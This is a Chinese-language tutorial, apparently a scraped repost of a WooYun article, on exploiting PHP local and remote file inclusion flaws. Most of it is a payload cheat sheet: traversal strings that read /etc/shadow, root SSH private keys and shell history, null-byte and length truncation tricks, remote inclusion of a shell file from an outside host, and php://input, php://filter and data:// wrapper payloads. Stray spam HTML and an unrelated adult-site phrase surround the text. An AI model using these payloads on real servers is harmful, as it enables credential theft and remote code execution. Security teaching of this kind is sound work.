<span id="7ztzv"></span>
<sub id="7ztzv"></sub>

<span id="7ztzv"></span><form id="7ztzv"></form>

<span id="7ztzv"></span>

        <address id="7ztzv"></address>

            原文地址:http://drops.wooyun.org/tips/3827

            0x00 前言


            PHP文件包含漏洞的產生原因是在通過PHP的函數引入文件時,由于傳入的文件名沒有經過合理的校驗,從而操作了預想之外的文件,就可能導致意外的文件泄露甚至惡意的代碼注入。最常見的就屬于本地文件包含(Local File Inclusion)漏洞了。

            我們來看下面一段index.php代碼:

            #!php
            if ($_GET['func']) {
               include $_GET['func'];
            } else {
               include 'default.php';
            }
            

            程序的本意可能是當提交url為http://example.com/index.php?func=add.php時,調用add.php里面的樣式內容和功能。直接訪問http://example.com/index.php則會包含默認的default.php

            那么問題來了,如果我們提交http://example.com/index.php?func=upload/pic/evil.jpg ,且evil.jpg是由黑客上傳到服務器上的一個圖片,在圖片的末尾添加了惡意的php代碼,那么惡意的代碼就會被引入當前文件執行。

            如果被包含的文件中無有效的php代碼,則會直接把文件內容輸出。

            在接下來的內容中會以代碼樣本作為例子,來給大家介紹各種奇葩猥瑣的利用姿勢。

            0x01 普通本地文件包含


            #!php
            <?php include("inc/" . $_GET['file']); ?>
            

            ?file=../../../../../../../../../var/lib/locate.db ?file=../../../../../../../../../var/lib/mlocate/mlocate.db

            (linux中這兩個文件儲存著所有文件的路徑,需要root權限)

            ?file=../../../../../../../../../usr/local/apache2/conf/httpd.conf

            (更多→http://wiki.apache.org/httpd/DistrosDefaultLayout)

            ?file=../attachment/media/xxx.file

            ?file=../../../../../../tmp/sess_tnrdo9ub2tsdurntv0pdir1no7

            (session文件一般在/tmp目錄下,格式為sess_[your phpsessid value],有時候也有可能在/var/lib/php5之類的,在此之前建議先讀取配置文件。在某些特定的情況下如果你能夠控制session的值,也許你能夠獲得一個shell)

            /root/.ssh/authorized_keys

            /root/.ssh/id_rsa

            /root/.ssh/id_rsa.keystore

            /root/.ssh/id_rsa.pub

            /root/.ssh/known_hosts

            /etc/shadow

            /root/.bash_history

            /root/.mysql_history

            /proc/self/fd/fd[0-9]* (文件標識符)

            /proc/mounts

            /proc/config.gz

            參見http://hi.baidu.com/mmnwzsdvpkjovwr/item/3f7ceb39965145eea984284el

            0x02 有限制的本地文件包含


            #!php
            <?php include("inc/" . $_GET['file'] . ".htm"); ?> 
            

            ?file=../../../../../../../../../etc/passwd%00

            (需要 magic_quotes_gpc=off,PHP小于5.3.4有效)

            ?file=../../../../../../../../../var/www/%00

            (需要 magic_quotes_gpc=off,unix文件系統,比如FreeBSD,OpenBSD,NetBSD,Solaris)

            ?file=../../../../../../../../../etc/passwd/././././././.[…]/./././././.

            (php版本小于5.2.8(?)可以成功,linux需要文件名長于4096,windows需要長于256)

            ?file=../../../../../../../../../boot.ini/………[…]…………

            (php版本小于5.2.8(?)可以成功,只適用windows,點號需要長于256)

            0x03 普通遠程文件包含


            #!php
            <?php include($_GET['file']); ?>
            

            ?file=[http|https|ftp]://example.com/shell.txt

            (需要allow_url_fopen=On并且 allow_url_include=On)

            ?file=php://input

            (需要allow_url_include=On,詳細→http://php.net/manual/en/wrappers.php.php)

            ?file=php://filter/convert.base64-encode/resource=index.php

            (同上)

            ?file=data://text/plain;base64,SSBsb3ZlIFBIUAo=

            (需要allow_url_include=On)

            ?file=http://127.0.0.1/path/xss.php?xss=phpcode

            (需要allow_url_fopen=On,allow_url_include=On并且防火墻或者白名單不允許訪問外網時,先在同站點找一個XSS漏洞,包含這個頁面,就可以注入惡意代碼了。條件非常極端和特殊- -)

            0x04 有限制的遠程文件包含


            #!php
            <?php include($_GET['file'] . ".htm"); ?> 
            

            (需要allow_url_fopen=On并且allow_url_include=On)

            0x05 延伸


            其實在前面也說了,這些漏洞產生原因是PHP函數在引入文件時,傳入的文件名沒有經過合理的校驗,從而操作了預想之外的文件。實際上我們操作文件的函數不只是include()一個,上面提到的一些截斷的方法同樣可以適用于以下函數:

            參考文章:

            http://websec.wordpress.com/2009/11/28/freebsd-directory-listing-with-php-file-functions/

            http://www.digininja.org/blog/when_all_you_can_do_is_read.php

            http://wiki.apache.org/httpd/DistrosDefaultLayout

            http://ddxhunter.wordpress.com/2010/03/10/lfis-exploitation-techniques/

            http://www.coresec.org/2011/05/12/local-file-inclusion-to-remote-command-execution-using-ssh/

            http://www.ush.it/2009/02/08/php-filesystem-attack-vectors/

            http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/

            http://diablohorn.wordpress.com/2010/01/16/interesting-local-file-inclusion-method/

            <span id="7ztzv"></span>
            <sub id="7ztzv"></sub>

            <span id="7ztzv"></span><form id="7ztzv"></form>

            <span id="7ztzv"></span>

                  <address id="7ztzv"></address>

                      亚洲欧美在线